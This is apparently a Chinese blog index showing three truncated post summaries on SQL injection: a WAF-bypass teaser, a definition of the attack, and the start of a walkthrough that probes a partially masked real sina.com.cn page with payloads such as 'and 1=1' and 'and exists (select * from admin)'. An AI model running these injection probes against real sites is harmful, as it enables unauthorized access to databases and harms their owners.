摘要：这篇文章之前的名字叫做：WAF bypass for SQL injection #理论篇，我于6月17日投稿了Freebuf。链接：点击这里现博客恢复，特发此处。 Web Hacker总是生存在与WAF的不断抗争之中的，厂商不断过滤，Hacker不断绕过。WAF bypass是一个永恒的话题... 阅读全文

摘要：SQL 攻击（SQL injection，台湾称作SQL资料隐码攻击），简称注入攻击，是发生于应用程序之数据库层的安全漏洞。简而言之，是在输入的字符串之中注入SQL指 令，在设计不良的程序当中忽略了检查，那么这些注入进去的指令就会被数据库服务器误认为是正常的SQL指令而运行，因此遭到破坏。有部份人认... 阅读全文

摘要：检测可否注入http://****.house.sina.com.cn/publics/detail.jsp?id=7674 and 1=1 (正常页面)http://****.house.sina.com.cn/publics/detail.jsp?id=7674 and 1=2 (出错页面)检测表段的http://****.house.sina.com.cn/publics/detail.jsp?id=7674 and exists (select * from admin)检测字段的http://****.house.sina.com.cn/publics/detail.jsp?id=7 阅读全文